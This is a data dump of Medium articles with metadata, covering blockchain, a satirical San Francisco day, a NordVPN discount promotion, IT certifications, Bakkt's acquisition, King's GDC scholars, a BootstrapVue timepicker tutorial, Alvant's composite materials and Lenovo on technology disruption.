‘’Trustless means you do not require any trust. Unlike putting money in a bank account, you are putting trust in your bank that it would be safe, it is never like that with blockchain because it is trustless in the sense that you don’t require any trust of anyone or party as the blockchain network is a self-working protocol that executes once the written rules are met”.
I have talked of blockchain in the light of how it is being used in bitcoin. Blockchains do not come in only this form. There are different kinds of blockchains. They can be public, private, consortium, or hybrid. Blockchains can also be centralized or decentralized.
Blockchain technology has continued to gain popularity. This was after it received a lot of criticism from the outset. Some big firms have embraced it and believers in this system think that if government parastatals embrace this technology, transparency would trump corruption. Still, others believe that it isn’t worth the whole fuss. One thing is sure about blockchain technology, we haven’t seen the best one yet. Like with all other technology, it can only get better. | https://medium.com/@jubileechukwuma/the-simple-idea-of-blockchain-9ac5a01c0740 | ['Amaka Chukwuma Jubilee'] | 2020-12-26 15:44:00.162000+00:00 | ['Fintech', 'Blockchain', 'Blockchain Technology', 'Content Writing', 'Copywriting'] |
120 | My Typical San Francisco Day | Co-authored by Amanda Legge and Erica Messner.
Illustration by Carlos Gamero Morales
I awake to the barking seals of Fisherman’s Wharf at precisely 10:34 a.m. After scrolling through Reddit from my bed with one sleepy eye, I head to the bathroom to drink some fresh Hetch Hetchy water straight from the sink. I look outside. It’s sunny, like it always is, and foggy, like it always is. I put a flower in my hair, walk down the wide front steps of my house, and wave good morning to my neighbors, Mary Kate & Ashley.
Then, I hop on the cable car, which I take all the way to Blue Bottle Coffee. Here, I wait in line behind 30 other people for a hand-poured, drip coffee, which I pay 17 dollars for. I use these precious minutes in line to check Product Hunt and read through Launch Ticker to make sure I didn’t inadvertently miss any big start-up or V.C. updates while I was sleeping. I make sure my AirPods are in tight and the music is bumping extra loud so that I can barely hear my name when my coffee is ready. Once I’ve got my coffee, I hop on a Bird scooter to go the remaining block to my downtown office.
My office is full of natural light and ping pong tables, and it even has a speakeasy hidden behind two swiveling library wall doors. We have an open floor plan, especially since our C.E.O. removed the desks last December for a company-wide Nerf gun battle. Now it’s just empty space and innovation. The perfect echo chamber, I like to say. I head to the kitchen, which is stocked with 100 gallons of coffee, a full keg, compostable utensils, and an infinite selection of fruits and nuts. Just like every morning, I grab one of the plump, perfectly ripe avocados to make myself avocado toast.
After work, I meet up with friends at Dolores Park. I leave the office around 4 p.m. to beat the rush hour. Assuming there aren’t any medical emergencies, it’s a pretty quick BART ride. When I get to our normal spot by the playground, my friends have already cracked open a few bottles of Anchor Steam. The truffle man and the pineapple-rum guy are making their usual rounds and I happily consume everything they offer me. As I twirl a blade of grass between my fingers, I stare out over the tennis courts at our beautiful city skyline and think about how lucky I am to live here.
My reflections are soon interrupted by my rumbling stomach, so I head to La Taqueria and El Farolito for a burrito. After that, I call it a night and request a Lyft Line. When my car arrives, I squeeze into the back seat next to my yoga teacher. Serves me right for trying to save $3. We drop the guy in the front seat off at Zeitgeist for his friend’s going away party and then make our way to the Castro where we pick up two charming gay men. We drive over the Golden Gate bridge, past Sutro tower, and up windy Lombard street. I listen to stories about their insecure friend Chodar and the types of guys he likes to go out with, and the ride flies by. As the Lyft Line approaches my delightfully crumbling Victorian house, I thank the driver and say a quick Namaste to my yoga teacher before hopping out. I finish the night by packing my last pair of Allbirds into a box — I’m moving to New York City! | https://medium.com/the-san-franciscan/my-typical-san-francisco-day-632e542226db | ['Erica Messner'] | 2021-01-14 17:35:31.436000+00:00 | ['San Francisco', 'Bay Area', 'Technology', 'Humor'] |
121 | 442oons offer a NordVPN discount, be a smart soccer fan — protect yourself online | 442oons is a highly successful YouTube channel that has over 2.5 million subscribers. They create animated football parodies with songs and pictures.
Dean Stobbart, originally a teacher from Norton, had in the past been a part-time voice actor and had also done some animation for his lessons.
Dean saw a gap in the market, noting that "no one really had done football cartoons before", and he decided to make his first video — a cartoon parody of Luis Suárez and Arsenal manager Arsène Wenger in a scene from The Silence of the Lambs.
Now 442oons offer a NordVPN discount for people that are concerned about their online safety.
How to get a NordVPN discount from 442oons?
Click on the link below:
442oons NordVPN 3-year subscription 70% discount
As soon as you will click on the link, you will be redirected to the NordVPN official website. Right there you will need to enter your payment details and choose a subscription (choose a 3-year deal) and at the bottom of the page you will see that the discount coupon has been automatically applied to your purchase:
What do you get from NordVPN?
With the 442oons 70% discount coupon for a 3-year NordVPN subscription, you become safe and secure online. Military-grade AES encryption will ensure you can safely browse on public Wi-Fi networks and hackers won't be able to steal your data; even if somebody manages to intercept it, there's no chance of decrypting it. In addition, whenever you connect to one of the 5000+ servers located in 62 countries, you won't be encumbered by a slow internet connection, because NordVPN does not limit your bandwidth: you can stream movies, play online video games, torrent files, and remain secure all at the same time.
Never heard of 442oons?
442oons started growing their user base back in 2013 after uploading Luis Suarez Silence of the Lambs remake and continued uploading soccer cartoons ever since.
Dean Stobbart, the creator of 442oons, trained as an actor in London and worked in plays and musicals in the West End as well as in TV and films. Afterwards he started working as a voiceover artist. Dean has always been a fan of animated comedy, from Gilliam's Monty Python to South Park, Beavis and Butthead, and American Dad.
442oons isn’t the only YouTuber who chose NordVPN for online security. Flossy Carter and Kephrii protect themselves online with NordVPN as well.
Why NordVPN?
Few more reasons why 442oons chose NordVPN:
NordVPN is based in Panama where no mandatory data retention laws exist — they don’t log your personal browsing data and don’t have to. You don’t have to worry about your privacy whenever browsing the internet when connected to one of the servers of this VPN provider.
NordVPN is offering an inbuilt ad blocking software that ensures you don’t come across a malicious ad.
If you’re travelling in Turkey, China or any other country where the internet is heavily censored — you can simply connect to a VPN server and grant yourself access to Netflix, Facebook and stream that NFL match you don’t want to miss.
NordVPN does not impose data bandwidth limits — you can remain secure online and stream movies without any issues regarding internet speed. | https://medium.com/@alexschort/442oons-nordvpn-discount-offer-ccdd09342ff7 | ['Alex Chort'] | 2019-09-30 13:45:01.153000+00:00 | ['Cybersecurity', 'YouTube', 'Privacy', 'Technology', 'VPN'] |
122 | What Makes Artificial Intelligence As One Of The Most Leading Technology In The Entire World ? | Abilities of human to reason out and do a particular task can be conventionally defined as “Intelligence”. So a technology developed by the human that can replicate this human behavior and activities can be broadly defined as Artificial Intelligence. The artificial intelligence can also be broken down to two parts- general AI and narrow AI. The general AI mainly focuses on the machines that have at least equal human intelligence, if not more, to perform various mechanical tasks. The narrow AI focuses on machines that follow strict parameters like image recognition, language translation, reasoning based on logic and evidence and also planning and navigation.
These days the AI performs tasks by grouping them in three categories of intelligence:
Sensing
Reasoning
Communicating
And when it comes to robotics, a fourth factor is added to AI , i.e. Movement.
Among the mammoth number of reasons that set AI apart as one of the most crucial technologies of current times, a few are as follows:
1. Extreme working conditions :
One of the most prominent aspects of AI is that it is capable of taking (figuratively) a part of the human brain to places or working environments humans cannot reach or survive in physically. This is why AI has grown to become the primary means for the advancement of humanity in fields such as astronomy, astrophysics, and cosmology.
2. Automation of repetitive tasks and objectives :
AI, on an elementary level, is capable of retaining process pathways and completing huge volumes of repetitive work all on its own, without the involvement of a human brain. This is what qualifies it to open up a multitude of future innovations and opportunities for humankind.
3. A more in-depth analysis of data :
The ability of computers to process massive amounts of data in a comparatively faster and more precise manner has opened up the scope for numerous future technological advancements and has resulted in enhanced data storage and security.
COURSE OBJECTIVES OF ARTIFICIAL INTELLIGENCE
To elevate business functions, AI is becoming smarter day by day. It is widely used in gaming, media, finance, robotics, quantum science, autonomous vehicles, and medical diagnosis as well. It has become a crucial prerequisite for companies to handle the enormous amounts of data generated regularly.
So, this course focuses mainly on practical, hands-on experiments that allow you to implement your ideas and analyze ways to make them better. Data science is an interdisciplinary field of scientific methods, algorithms, and more that can be used to help AI function smoothly. This knowledge gives you the leverage of world-class industry expertise and boosts your confidence to solve real-life projects.
THE OVERALL GOAL OF ARTIFICIAL INTELLIGENCE
AI engineers aim to make and implement AI that is ever smarter, more advanced, and more efficient for daily-life applications. AI can be used to minimize human error in a particular job. Precision, accuracy, and speed are the basic advantages of AI over humans. Hostile environments, dangerous tasks that could cause injuries, or any job with an emotional variable that might affect humans can also be handled perfectly well by AI.
123 | Top 7 certifications in 2021 | highest paying IT certifications in 2021 | Have any of these and you will be welcomed anywhere.
This article will walk you through the top 7 certifications in 2021 that are blowing up in the current job market, giving you a brief but in- depth analysis on what they cover and their respective job salaries.
These will help you dominate in your career and give you that huge salary advantage.
By the way, I am Agbejule Kehinde Favour.
Are you Pumped👍?
Cool!!
Stay tuned for the top spot🔥🔥🔥
With that said, let’s continue!!
Here is the list
Number 7
Digital marketing
Photo by Merakist on Unsplash
Digital marketing, as the name implies, deals with the utilization of the internet and other digital technologies to advertise or sell a company's products and services.
Considering the fact that digital marketing is growing at a geometric progression nowadays, here is one of the best certifications you can take up.
The Google analytics IQ certification
It shows off your capabilities in analytical concepts like measuring campaign metrics, analysing KPIs, and much more.
In the US, a digital marketing manager can earn about $112000 per annum with the right certification at hand.
Number 6
Big data
Photo by Luke Chesser on Unsplash
Big data allows you to analyse, extract and deal with huge and sophisticated data sets.
Here is one of the best certifications you can pick up.
# The Associate Certified Analytics Professional Certification (aCAP)
It focuses on analytics domains like:
# Analytics problem framing
# Business problem framing and much more.
Therefore, having this certification gives you the knowledge you need to get started with the analytics process.
A big data engineer can earn up to $158000 annually in the US.
Number 5
Networking
Photo by Jainath Ponnala on Unsplash
It involves the process of moving and exchanging data between nodes over a shared network.
So you can pick up;
The Cisco CCNA and CCNP certifications
These associate- and professional-level certifications showcase your ability to work with Cisco networking solutions.
A networking engineer, with the right certification, earns approximately $130000 per annum in the United States.
Number 4
Cyber security
Photo by Dan Nelson on Unsplash
This refers to the protection of electronic systems and other electronic technologies from malicious attacks.
Here are the best qualifications you can take up.
1. The Certified Ethical Hacker Certification.
It showcases your ethical hacking skills across its five phases:
# Reconnaissance
# Enumeration
# Gaining or getting access
# Sustaining or maintaining access
# Hiding or covering tracks
2. The Certified Information System Security Professional Certification ( CISSP ).
Your ability to draw plans, implement and manage a cyber security program is shown off by this certification.
Getting certified also validates your expertise and gives you access to exclusive resources, tools and other opportunities
With the right certification, a cyber security engineer earns about $150000 annually in the United States.
Next up!
Number 3
Cloud computing
Photo by Sigmund on Unsplash
It involves delivering a range of computing services over the internet, often on a pay-as-you-go basis.
Some of the popular certifications you can take up are:
1. The AWS Certified Solution Architect Associate Certification
This qualification will showcase your ability to design, deploy and secure apps on AWS using suitable architectures, services and lots more.
2. The Microsoft Certified Azure Administration Certification
This certification is most suitable for people who want to manage cloud services covering:
# cloud capabilities
# storage
# Security and
# Networking.
A cloud computing engineer, with the right certification at hand, can earn about $163000 per annum in the United States.
Number 2
Data science
Photo by Myriam Jessier on Unsplash
Data science refers to the combination of algorithms, scientific methods and systems to extract or collect information and insights from structured and unstructured data.
The best certifications you can take up in this field are:
1. HarvardX Data Science Professional Certificate
It covers topics like:
# Data visualization
# Inference
# R programming skills
# Machine learning algorithms
# Important data science tools
# Concepts like probability and much more
2. The IBM Data Science Professional Certification.
As the name implies, it is powered by IBM.
It can help you kick-start mastering:
# Data science
# SQL
# the development of machine learning tools
# Python
# the analysis and visualization of data, just to mention a few.
A data scientist, by picking the right certification, can earn up to $154000 in the US.
Finally the best, hottest and highest paying certification in 2021 is 🥁🥁🥁.......
Wait for it!
Number 1
AI and machine learning
Artificial intelligence is the brilliance and cleverness displayed by machines
Photo by Arseny Togulev on Unsplash
Machine learning, on the other hand, is the study of computer algorithms that allows systems to learn based on experience.
Photo by David Levêque on Unsplash
Here are the best certifications you can pick up.
1. Artificial Intelligence A-Z Certification By Udemy
It covers the concepts of machine learning, data science and deep learning to develop well-built real life applications
2. Machine learning, AI certification by Stanford offered by Coursera
This covers :
# The introduction to machine learning
# Data mining
# The best practices in machine learning
# Statistical pattern recognition and so on.
An AI engineer can earn approximately $150000, with the right certification in the US.
Conclusion
So that’s my package!
Those are the top 7 certifications in 2021!
What do you think of the list?
I would love to know what your list on this topic looks like!
Drop your answers in the response section.
It will be fun.
On your way there, don’t forget to leave some...👏👏👏
Thanks for your time!
Good luck!! | https://medium.com/analytics-vidhya/top-7-certifications-in-2021-highest-paying-it-certifications-in-2021-9c7f40f40f57 | [] | 2021-02-11 10:42:50.692000+00:00 | ['Advice', 'Certification', 'Information Technology', 'Programming', 'Jobs'] |
124 | Our first acquisition | Expanding Bakkt’s risk management, compliance and treasury operations
As we work to complete our first acquisition, the New Year is starting as deliberately as 2018 ended — punctuated by the closing of our first capital raise.
As those who’ve followed us since our first announcement in August know, our mission is to build the first integrated, institutional grade exchange-traded markets and custody solution for physical delivery of digital assets. In parallel, we’re building a secure, scalable platform for transacting with digital assets so that our regulated ecosystem serves consumers, merchants and institutions.
To advance that effort, I’m pleased to share that we have entered into an agreement to acquire certain assets of Rosenthal Collins Group (RCG), an independent futures commission merchant with nearly 100 years of earning clients’ trust. In December, RCG announced the sale of all its customer accounts to Marex Spectron, one of the world’s largest commodity brokers. As part of that transaction, our aim was to purchase certain valuable assets related to developing our platform. We expect to close the transaction in February, and are excited to welcome members of the RCG team to Bakkt.
How does this advance our work? First, it will enhance our risk management and treasury operations with systems and expertise. Other aspects of the transaction will contribute to our regulatory, AML/KYC and customer service operations as we help enable digital asset acceptance by bringing more choice and control to buyers and sellers.
This acquisition underlines the fact we’re not standing still as we await regulatory approval by the CFTC for the launch of regulated trading in our crypto markets. Our mission requires significant investment in technology to establish an innovative platform, as well as financial market expertise to deliver the most trusted fintech ecosystem for digital assets.
Our vision is to bring digital assets into the mainstream by enabling efficient transactions between consumers and merchants. Distributed ledger technology (DLT) has the potential to contribute to a lean, modern transaction platform that is compatible with existing merchant infrastructure. While DLT and cryptocurrencies are early in their development, we are committed to expanding the use of this technology to promote choice by building a fair, efficient platform for digital assets globally. | https://medium.com/bakkt-blog/our-first-acquisition-d8185bf99287 | [] | 2019-01-14 16:25:47.468000+00:00 | ['Technology', 'Cryptocurrency', 'Crypto', 'Fintech', 'Blockchain'] |
125 | Q&A with King’s 2019 GDC Scholars | If one blog post isn’t enough, we have more answers from King’s 2019 GDC scholars on their experiences at GDC!
For the fourth year in a row, in partnership with Diversi (a non-profit organisation which works for greater diversity within gaming), we offered female students a complimentary All Access pass to attend the 2019 Game Developer Conference in San Francisco and also an internship in one of our game studios. The scholarship is a part of our long term plan to encourage more female talent to join the games industry and so far has been a success, with all five scholars of 2018 joining King in full-time roles.
This year, the scholarship positions were tripled to fifteen, and the scholars have since returned from GDC ready to start their individual roles.
Ilke — Game Artist Intern — London
What was the best session/talk you attended?
My favourite session was ‘Expanding the World of Candy Crush: A Postmortem on ‘Candy Crush Friends Saga’ by Tracey John, Jeremy Kang and Robert Mackenzie, all speakers from King. The talk focused on the challenges posed by creating a new game in an old franchise in terms of the games’ art and design. There were a lot of details that I hadn’t thought about before. Seeing the problems as well as the team’s approach to solving them was enlightening to see!
What from GDC will you hope to take back to your work at King?
There were so many great talks by amazing people from King at GDC, it was an incredible insight into the work ethic and the King culture, and I’m really excited to be part of that! I’ve learnt about topics so much broader than my work role and I think that’s really important to be able to communicate with people from other teams and work together.
Sandra — Game Developer Intern — Barcelona
What was the best session/talk you attended?
‘Marvel’s Spider-Man’ AI Postmortem was the first session I attended and it is, without a doubt, the one that I enjoyed the most. The speaker, Adam Noonchester, talked about a vast amount of topics surrounding the game’s AI — from the combat to the animations, along with the navigation and physics, among others. I had to stop taking notes about what he explained, because it was a lot and everything was very interesting. As a game programmer, I could spend hours listening to how specific features and systems are made — and even more if I like the game!
Were there any tech sessions you enjoyed? If so, what was the session and why?
On Tuesday, I spent most of the day in the room where the ‘Math for Game Developers’ sessions were held. Among the tasks (all of them programming tutorials), the ‘Generating and using Navigation Meshes’ really caught my attention. Recently, we integrated the Recast & Detour libraries into the game engine that we are building at University for a project. This talk allowed me to have a better understanding of the complexity behind the generation from scratch and the later use of a navigation mesh through a step-by-step guide.
What attracted you to King?
King has always been very colourful to me, because of its titles and because of its culture. Everything at King goes around the word ‘fun’. The company shows the love that pours into the development of video games by putting the community first. In the first place, the community of workers, not only by having the most magical atmosphere in their offices but also by emphasising diversity. In second place, the community of players, from my younger cousin to my grandmother.
Andrea — Level Designer Intern — Malmo
What were you most excited for at GDC?
I was excited to go there and meet both the other GDC scholarship winners and other important video game developers from the industry. I was excited to go there and have a real taste of what a real videogame developer would in such a conference and learn as much from those people as possible for my future internship at King!
What from GDC will you hope to take back to your work at King?
The ability to learn from every person I meet regardless of their role to make myself a better professional and student and to never lose this ability to learn on the new industry standards as the years go by.
Angelika — Technical Artist Intern — Berlin
What was the best session/talk you attended?
I focused on the roundtables and tutorials — the ones that didn’t get recorded. This is where it was at — the round tables — full of great experienced people willing to share their problems and solutions, their knowledge so we can advance faster as an industry.
Were there any tech sessions you enjoyed? If so, what was the session and why?
“Math Game for Game Developers: Inside Neural Networks”
I loved Michael Buttner’s approach of including neural networks in a real-time scenario in Unity. That was, for me, the most advanced math talk. It uncovered the great hidden potential of using Neural Networks to solve difficult problems in performance-critical code.
Josefin — Level Designer Intern — Stockholm
What attracted you to King?
It’s an inclusive and creative work environment, which is very important to me. One of my personal goals is to make games that anyone can play, and to make gaming more inclusive, which is something that aligns very well with King’s goals.
Were there any tech sessions you enjoyed? If so, what was the session and why?
Adam Noonchester’s talk “Marvel’s Spider-Man AI Postmortem” was great. It was interesting to learn about advanced ways to use AI animations, attacks, and collisions in a big open world game.
GDC is an opportunity for King’s scholars to learn more about the industry and to gain a greater understanding of not only what tech is used when developing a game, but other areas they may be unaware of before. This experience will be useful during their scholarship and hopefully beyond!
If you would like to join our Kingdom, check out the opportunities on our job page! | https://medium.com/techking/q-a-with-kings-2019-gdc-scholars-cd7e0855db17 | ['Tech At King'] | 2019-06-13 06:25:19.442000+00:00 | ['Technology', 'Gaming', 'Gdc2019', 'Lifeatking', 'Internships'] |
126 | BootstrapVue — Text Area Customization and Time Picker | Photo by Daniel Klein on Unsplash
To make good looking Vue apps, we need to style our components.
To make our lives easier, we can use components with styles built-in.
In this article, we’ll look at how to customize a text area and add a time picker.
v-model Modifiers
The lazy, trim and number modifiers for v-model aren’t supported by the b-form-textarea component.
However, the trim, number, and lazy props can be used to replace those modifiers.
Debounce
We can add the debounce prop to delay the input value binding to the state.
For instance, we can write:
<template>
<div id="app">
<b-form-textarea v-model="text" placeholder="Enter text" debounce="500" ></b-form-textarea>
<p>{{text}}</p>
</div>
</template>

<script>
export default {
name: "App",
data() {
return {
text: ""
};
}
};
</script>
Then we delay the input value binding by 500 ms.
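To see what the debounce prop is doing conceptually, here is a minimal standalone sketch of trailing-edge debouncing in plain JavaScript. It is driven by an explicit clock so it can run without real timers — an illustration of the idea only, not BootstrapVue’s actual implementation (the helper names here are made up for the sketch).

```javascript
// Trailing-edge debounce: rapid calls collapse into one, which fires only
// after `wait` ms of silence. Time is passed in explicitly for clarity.
function makeDebouncer(fn, wait) {
  let pendingArgs = null;
  let deadline = Infinity;
  return {
    call(args, t) {      // record a call at time t; reset the quiet window
      pendingArgs = args;
      deadline = t + wait;
    },
    tick(t) {            // advance the clock; fire once if quiet long enough
      if (pendingArgs !== null && t >= deadline) {
        fn(...pendingArgs);
        pendingArgs = null;
      }
    },
  };
}

const seen = [];
const d = makeDebouncer(v => seen.push(v), 500);
d.call(["E"], 0);    // user types "E" at t = 0ms
d.call(["En"], 100); // keeps typing at t = 100ms — pending value replaced
d.tick(400);         // only 300ms of silence so far: nothing fires
d.tick(700);         // 600ms after the last keystroke: fires once with "En"
```

With debounce="500" on the text area, the bound state behaves like seen above: intermediate keystrokes never reach the model, only the value that survives 500ms of silence.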
Autofocus
The autofocus prop can be added to the b-form-textarea to make it focus when the component loads or reactive in a keep-alive component.
Timepicker
We can use the b-form-timepicker component to add a time picker.
For instance, we can write:
<template>
<div id="app">
<b-form-timepicker v-model="value" locale="en"></b-form-timepicker>
<div>Value: {{ value }}</div>
</div>
</template>

<script>
export default {
name: "App",
data() {
return {
value: ""
};
}
};
</script>
Then we can pick the time from the displayed input box.
The locale prop lets us change the locale.
value has the selected value, which is bound to the inputted value with v-model .
Disabled or Read Only States
We can add the disabled prop to remove all interactivity on the b-form-timepicker component.
readonly disables selecting a time, but will keep the component interactive.
We can write:
<b-form-timepicker v-model="value" disabled></b-form-timepicker>
or:
<b-form-timepicker v-model="value" readonly></b-form-timepicker>
to change both.
Validation States
Like other input components, we can display the validation state with it.
For instance, we can write:
<template>
<div id="app">
<b-form-timepicker v-model="value" :state="!!value"></b-form-timepicker>
<div>Value: {{ value }}</div>
</div>
</template>

<script>
export default {
name: "App",
data() {
return {
value: ""
};
}
};
</script>
We set the state prop to the value of value converted to a boolean.
Then we’ll see a red box if the time isn’t selected.
Otherwise, we see a green box.
Setting Seconds
We can set the seconds by adding the show-seconds prop.
For instance, we can write:
<template>
<div id="app">
<b-form-timepicker v-model="value" show-seconds></b-form-timepicker>
<div>Value: {{ value }}</div>
</div>
</template>

<script>
export default {
name: "App",
data() {
return {
value: ""
};
}
};
</script>
Now we see the seconds box and we can set the seconds.
Sizing
We can add the size prop to change the size of the time picker sizing.
For example, we can write:
<template>
<div id="app">
<b-form-timepicker v-model="value" size="sm"></b-form-timepicker>
<div>Value: {{ value }}</div>
</div>
</template>

<script>
export default {
name: "App",
data() {
return {
value: ""
};
}
};
</script>
to shrink the time picker’s size.
We can also change the value to 'lg' to make it larger than the default.
Optional Controls
We can add optional controls to the time picker with a few props.
For instance, we can add the now-button to let users pick the current time.
reset-button displays a reset button to let users reset the time.
For example, we can write:
<template>
<div id="app">
<b-form-timepicker v-model="value" now-button reset-button></b-form-timepicker>
<div>Value: {{ value }}</div>
</div>
</template>

<script>
export default {
name: "App",
data() {
return {
value: ""
};
}
};
</script>
Then we can see the buttons on the time picker.
Button Only Mode
The button-only prop lets us change the time picker to button-only mode.
For example, we can write:
<template>
<div id="app">
<b-input-group class="mb-3">
<b-form-input v-model="value" type="text" placeholder="Select time"></b-form-input>
<b-input-group-append>
<b-form-timepicker v-model="value" right button-only></b-form-timepicker>
</b-input-group-append>
</b-input-group>
<div>Value: {{ value }}</div>
</div>
</template>

<script>
export default {
name: "App",
data() {
return {
value: ""
};
}
};
</script>
Then we have an input box with the time displayed.
But we can’t click it to show the time picker.
The button on the right of the input box lets us select the time.
We need the right prop so that the right edge of the date picker will be aligned to the right side of the button.
Photo by Mike Benna on Unsplash
Conclusion
We can add debounce to a text area.
We can also add a time picker control and customize it.
127 | Scale-up Spotlight: A conversation with the commercial director of Alvant, Richard Thompson | Scale-up Spotlight: A conversation with the commercial director of Alvant, Richard Thompson
Richard Thompson, commercial director of materials specialist Alvant, talks about the importance of sustainability and innovation in post-Covid manufacturing and the role materials tech is playing across automotive, aerospace, consumer tech, and many other sectors. Top Business Tech Dec 28, 2021·5 min read
Alvant — originally known as CMT — was established in 2003, specializing in designing, developing, testing, and manufacturing Aluminium Metal Matrix Composite materials and components (AMCs), a family of lightweight high-performance metals. AMCs are used in highly engineered products for multiple applications across many sectors, including aerospace, automotive, healthcare, the industrial, and high-end consumer. This can be parts for TVs, mobile devices, landing gear, electric motors, car interiors, biomechanical prosthetics, sports equipment, and wheelchairs — the list is as diverse as it is long!
AMCs provide the strength and stiffness of steel at less than half the weight and have superior damage tolerance and a higher thermal operating range. Engineers and manufacturers can use AMCs for more durable lightweight components for harsh environments. Product manufacturers and engineers are becoming more aware of how AMCs can sometimes be a better alternative than other composite materials or unreinforced metals.
Alvant provides ‘route to market’ services for integrating its AMCs; The focus is on solving problems with creative and commercially viable solutions. This is particularly important now as engineers face growing pressure to reduce weight to meet stringent market and legislative demands while simultaneously being cost-effective.
Richard Thompson informs that the method Alvant uses to create its materials, called Advanced Liquid Pressure Forming, has been developed specifically for its product and is patented. This sets the company apart from others in the market and makes them a viable alternative to other materials such as carbon and polymer composites, steel, titanium, and aluminum. These materials are either not recyclable or very difficult to recycle, unlike fiber-reinforced AMCs that have scope to recycle.
AMCs have many benefits, including having the strength and capability of steel yet the weight of aluminum while being more tolerant to physical and thermal damage than carbon composite materials. They also create less of an impact environmentally when it comes to sustainability issues. This is mainly because aluminum itself is abundant and has a less environmental impact during production than titanium.
It isn’t difficult to see why AMCs could provide a massive differential and offer game-changing potential across many industries as commercial demand increases for strong but lighter parts across many forms of transportation, as well as industrial and consumer applications. Companies are all looking for ways to increase product capabilities and performance while at the same time meeting ambitious goals for fuel efficiency and sustainability.
Thompson explains the company’s most significant achievement to be the part the company has contributed to the global-wide objective to achieve net-zero carbon emissions by 2050. Alvant has partnered with global-leading Safran Landing Systems on a two-year, £28 mn aerospace project titled ‘Large Landing Gear of the Future.’ Alvant’s contribution to the project is the design, manufacture, and testing of an AMC brake rod, targeting a 30% weight reduction over an equivalent titanium component while maintaining the same strength as steel. In fact, the current simulations suggest a 40% weight saving can be achieved over the original titanium part, with a crucial project milestone scheduled for completion this year.
Alvant has partnered with Safran in the aerospace sector to create lighter weight landing gear
Besides weight reduction, the project aims to cut fuel burn and noise as part of the industry’s drive to reduce fuel consumption and carbon emissions while improving reliability and lowering ownership costs. This is of major significance for Alvant as a company because the project’s success will enable the validation of AMCs in areas where safety and reliability are essential. This puts Alvant firmly on course to help Safran not only solve some of their upcoming technological challenges but to help them remain competitive in the landing gear aerospace market and showcase innovative technologies for the industry’s future.
During Covid, the economy’s sudden plunge instantly impacted most automotive, industrial, and aerospace sectors, which unfortunately is where a significant chunk of Alvant’s market is based. Thompson says that “although we have been able to function throughout, it gave us an opportunity to bring forward part of our business growth plan and has enabled us to forge partnerships with manufacturers who still need to achieve the ambitious capability and sustainability goals, but with reduced internal resources. So, we’ve been quite lucky in many regards.”
Moving forward, Thompson explains that the company has seen the biggest emissions decline since the Second World War during the Covid lockdown and explains that stakeholders are more concentrated now on Zero-emissions goals, so have different expectations on businesses. “Sustainability is redefining itself in the post-Covid world, and it has now changed scope, placing non-sustainable materials under far more scrutiny.” Focus has been placed largely on sustainable materials, and businesses are now considering the entire product life cycle and the ability to reuse, which is now very much a consideration in design development at Alvant.
AMCs are more sustainable thanks to the manner in which they separate the fibers from the aluminum at the end-of-life stage. Designers must increasingly factor ‘whole life cost’ into the design, and it’s an area where AMCs score well. “If we don’t use the past 12 months or so as a wake-up call and an opportunity to prompt radical change, then I don’t know what will. We may not get another chance,” Thompson states.
About Richard Thompson
Commercial Director (BEng MBA CEng FIMechE)
Richard is a technology commercialization professional specializing in strategic market development, innovation, and new venture growth. Richard joined Alvant in October 2017 from Williams Advanced Engineering, the technology and engineering consultancy division of the Williams Formula 1 Group. He has worked for a range of high-performance engineering businesses and new venture companies developing and commercializing intellectual property. Richard was appointed as Commercial Director in February 2018. | https://medium.com/tbtech-news/scale-up-spotlight-a-conversation-with-the-commercial-director-of-alvant-richard-thompson-575625231f2a | ['Top Business Tech'] | 2021-12-28 10:05:31.874000+00:00 | ['It', 'Technology', 'Alvant', 'Business', 'Scaleup Spotlight'] |
128 | Technology’s Voodoo Reputation: Unfair and Unwarranted | Ask any engineer the question, “is technology disruptive”, and the answer will be “of course!”
The result of that disruption is often that technology attracts a voodoo reputation — something to be wary of, or even feared.
It’s a reputation that is unfair and unwarranted.
We forget that we’ve become accustomed to change, and adept at embracing any technology that suits our lifestyles, or improves the way we work. We’re more comfortable about disruptive change than we once were — because we know that, once technology has done its disruptive worst, it evolves to become productive in its impact, and how it changes our lives.
This evolution process is not new, and predates IT, but the evolution process has become much faster. When I joined Lenovo in 2005, social media, online communities, the concept of cloud computing, and always-on connectivity were still evolving concepts, and most took some years to make their mark on the business mainstream (something that’s difficult now to remember!).
The most-obvious recent example is the Covid-era move to working from home. Most of us have made that transition (albeit with little choice, as it happens), and technology, although a disruption for many, has made this possible.
At first we reacted out of necessity. Now we’re moving to the productive end of this technology continuum — in as little as six months. Companies are moving from managing an abrupt change of workplace options to planning for their futures, in particular the degree to which they deploy technology to allow those of us who want to stay based at home to do so. Users are challenging the way they used technology before the lockdown. The WEF reported in June that 98% of workers wanted the option to work from home for the rest of their careers! That’s a big shift, and productive technology, hard on the heels of an initial disruptive event, continues to play its part.
Forget voodoo: Technology drives business advantage
That unfair voodoo reputation also often stems from concerns that technology will replace people, shut down businesses or affect livelihoods when it appears for the first time. Today, those fears revolve around technology that includes AI, machine learning, and technology security, as examples.
As an executive with an engineering background working with many businesses, listening to their needs, and leading teams that work out solutions to meet those needs, I believe it’s more the case that technology solves problems, and freeing time to consider what really matters in businesses — customer experiences and employee satisfaction.
User mobility is one example. One of the biggest pains most of us suffer is that we use multiple passwords every day. In tomorrow’s mobile world, devices will know who I am by my voice, perhaps in the context of my location, how I’m about to use my device and the network it’s attached to. If it sounds like me, if I’m acting in a way that’s consistent with who I am in the company, if the work I want to do fits what’s been seen from me in the past, it probably is me — and I can be given access rights to data and resources to be able to do my work without the current pain of having to remember multiple passwords, or of joining and leaving discrete networks.
Acknowledging that technology often starts as disruptive, and ends up being productive, how should organizations move ahead?
By addressing the business problem in new ways, using technology to drive new and different approaches to resolving those problems.
The story always needs to be about how technology is going to give you business advantage — whether it’s attracting and keeping talent, or enabling a field engineer to understand a problem more effectively, leveraging data and edge computing to make better decisions.
The questions about disruption versus innovation then become centered on the business problems for which you want to find a technology solution.
Answer those questions, and technology’s voodoo reputation around technology disappears.
I’ll expand on some of these themes in future articles, but in the meantime, let me know your thoughts on the Comments below. I’d love to start a conversation.
About the Author
Jerry Paradise is a 15-year veteran of Lenovo. He is responsible for leading the team that develops the product requirements, including the technical and design specifications, for all of Lenovo’s commercial products outside the data center. Start a conversation with Jerry here, on LinkedIn or on Twitter. | https://medium.com/swlh/technologys-voodoo-reputation-unfair-and-unwarranted-2db98be92b34 | ['Jerry Paradise'] | 2020-08-13 07:24:38.186000+00:00 | ['Tech', 'Disruption', 'Lenovo', 'Disruptive Innovation', 'Technology'] |
